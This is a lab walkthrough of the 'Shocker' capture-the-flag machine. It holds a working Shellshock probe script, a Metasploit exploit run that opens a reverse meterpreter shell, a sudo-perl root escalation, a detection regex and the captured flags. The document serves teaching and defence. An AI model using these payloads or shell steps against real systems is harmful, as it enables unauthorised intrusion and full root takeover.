Shocker
Initial Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.56
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-21 03:17 EDT
Nmap scan report for 10.10.10.56
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.56 -sV -A -p80,2222
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-21 03:18 EDT
Nmap scan report for 10.10.10.56
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds
Our initial Nmap scan shows 2 open ports: 80 (http) and 2222, which nmap's default port table labels EtherNetIP-1. The follow-up version scan (-sV) identifies 2222 as SSH (OpenSSH 7.2p2) running on a non-standard port. Since we have no credentials, we start with port 80 and see what the web server is hosting:
HTTP
Navigating to the website, we see a page containing only an image, “Don’t Bug Me!”. Requesting /favicon.ico returns a 404, and the error page confirms the server is Apache/2.4.18. We run DirBuster to look for useful paths:
The initial scan finds 2 directories. Scanning further inside cgi-bin, we identify user.sh. A shell CGI script served by Apache mod_cgi on a 2016-era Ubuntu build is a strong hint for Shellshock (CVE-2014-6271): mod_cgi passes request headers to the script as environment variables, and an unpatched bash executes any commands appended to an exported function definition in one of them. Metasploit has a module for exactly this case.
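Before reaching for Metasploit it is worth confirming the bug by hand, and knowing what the attack looks like in the server's logs. The following is an added example, not code from the original writeup: it builds the CVE-2014-6271 header, sends a harmless marker command to the target and CGI path found above (10.10.10.56, /cgi-bin/user.sh are taken from the enumeration; MARKER is an assumption), and runs the same pattern as a detection over a constructed Apache access-log sample.

```python
"""Manual Shellshock (CVE-2014-6271) probe and access-log check.

Added example, not code from the original writeup. It assumes the target
host and CGI path found during enumeration (10.10.10.56, /cgi-bin/user.sh);
MARKER and SAMPLE_LOG are constructed for this example.
"""
import re
import socket

TARGET_HOST = "10.10.10.56"
TARGET_PORT = 80
CGI_PATH = "/cgi-bin/user.sh"
MARKER = "SHOCK_MARKER"  # constructed marker so the check is not just "200 OK"


def build_shellshock_header(cmd: str, header: str = "User-Agent") -> str:
    """Build one request header carrying the CVE-2014-6271 pattern.

    mod_cgi exports request headers to the script as environment variables
    (User-Agent becomes HTTP_USER_AGENT). An unpatched bash treats a value
    that starts with '() {' as an exported function definition and keeps
    parsing, so the commands after the closing '};' run when the CGI
    script's bash starts. The two echos emit the blank line that separates
    CGI headers from the body, so the command output reaches the client.
    """
    return f"{header}: () {{ :; }}; echo; echo; {cmd}"


def build_probe_request(cmd: str, host: str = TARGET_HOST,
                        path: str = CGI_PATH) -> bytes:
    """Raw HTTP/1.1 GET with the injected header, CRLF-terminated."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        build_shellshock_header(cmd),
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def is_vulnerable(response: str, marker: str = MARKER) -> bool:
    """The marker only appears in the response if our command actually ran."""
    return marker in response


def probe(host: str = TARGET_HOST, port: int = TARGET_PORT,
          path: str = CGI_PATH, timeout: float = 5.0) -> bool:
    """Send a harmless marker command and report whether it executed."""
    cmd = f"/bin/bash -c 'echo {MARKER}; id'"
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe_request(cmd, host, path))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return is_vulnerable(b"".join(chunks).decode(errors="replace"))


# Defender side: the same prefix is what to hunt for in Apache access logs.
# Matches '() { :; };', '(){:;};' and similar spacing variants.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def find_shellshock_in_log(lines):
    """Return (line_number, line) for each entry carrying the pattern."""
    return [(n, line) for n, line in enumerate(lines, 1)
            if SHELLSHOCK_RE.search(line)]


# Constructed sample in Apache combined format, not real logs from the box.
SAMPLE_LOG = [
    '10.10.14.3 - - [21/Oct/2024:04:10:01 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.14.3 - - [21/Oct/2024:04:11:45 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo; echo; /bin/bash -c \'id\'"',
    '10.10.14.3 - - [21/Oct/2024:04:12:02 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "(){:;}; /bin/cat /etc/passwd"',
    '10.10.14.3 - - [21/Oct/2024:04:12:30 -0400] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (Windows NT 10.0)"',
]


if __name__ == "__main__":
    for n, _ in find_shellshock_in_log(SAMPLE_LOG):
        print(f"log line {n}: shellshock pattern in request headers")
    print("vulnerable:", probe())
```

The probe deliberately runs only `echo` and `id`; if the marker comes back, the CGI script's bash honoured the function prefix and the Metasploit run below will work. Note that the detection regex matches the prefix in any logged field, but Apache's combined format only records Referer and User-Agent, so an attacker using Cookie or a custom header is invisible there; for that, inspect the request headers in a proxy or IDS capture instead.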
Initial Access
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the
makerc command
=[ metasploit v6.4.18-dev ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: <https://docs.metasploit.com/>
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2 \_ target: Linux x86 . . . .
3 \_ target: Linux x86_64 . . . .
4 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
5 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
6 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
7 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
8 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
9 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
10 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
11 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
12 \_ target: Linux x86 . . . .
13 \_ target: Linux x86_64 . . . .
14 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
15 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
Interact with a module by name or index. For example info 15, use 15 or use exploit/multi/misc/xdh_x_exec
msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html>
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.106.130 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 10.10.10.56
RHOSTS => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.56:40320) at 2024-10-21 04:11:45 -0400
meterpreter > shell
Process 1530 created.
Channel 1 created.
python3 -c 'import pty; pty.spawn("/bin/bash")'
shelly@Shocker:/usr/lib/cgi-bin$ cd /
cd /
shelly@Shocker:/$ cd /home
cd /home
shelly@Shocker:/home$ cd shelly
cd shelly
shelly@Shocker:~$ ls -la
ls -la
total 36
drwxr-xr-x 4 shelly shelly 4096 Sep 21 2022 .
drwxr-xr-x 3 root root 4096 Sep 21 2022 ..
lrwxrwxrwx 1 root root 9 Sep 21 2022 .bash_history -> /dev/null
-rw-r--r-- 1 shelly shelly 220 Sep 22 2017 .bash_logout
-rw-r--r-- 1 shelly shelly 3771 Sep 22 2017 .bashrc
drwx------ 2 shelly shelly 4096 Sep 21 2022 .cache
drwxrwxr-x 2 shelly shelly 4096 Sep 21 2022 .nano
-rw-r--r-- 1 shelly shelly 655 Sep 22 2017 .profile
-rw-r--r-- 1 root root 66 Sep 22 2017 .selected_editor
-r--r--r-- 1 root root 33 Oct 21 03:17 user.txt
shelly@Shocker:~$ cat user.txt
9035239845165600291c13d036f2db5a
Privilege Escalation
shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
A textbook sudo -l result. The output shows that our user shelly can run /usr/bin/perl as root with NOPASSWD. The GTFOBins entry for perl (https://gtfobins.github.io/gtfobins/perl/) shows that perl can spawn an interactive shell with perl -e 'exec "/bin/sh";', so running that under sudo gives us a root shell. Note that the env_reset and secure_path defaults do not help here: the problem is not the environment but that perl is a full interpreter, so a sudo rule on it is equivalent to unrestricted root.
shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
# whoami
whoami
root
# cd /
cd /
# cd root
cd root
# ls
ls
root.txt
# cat root.txt
cat root.txt
36922f38b3edab38bdd9f25e813758e8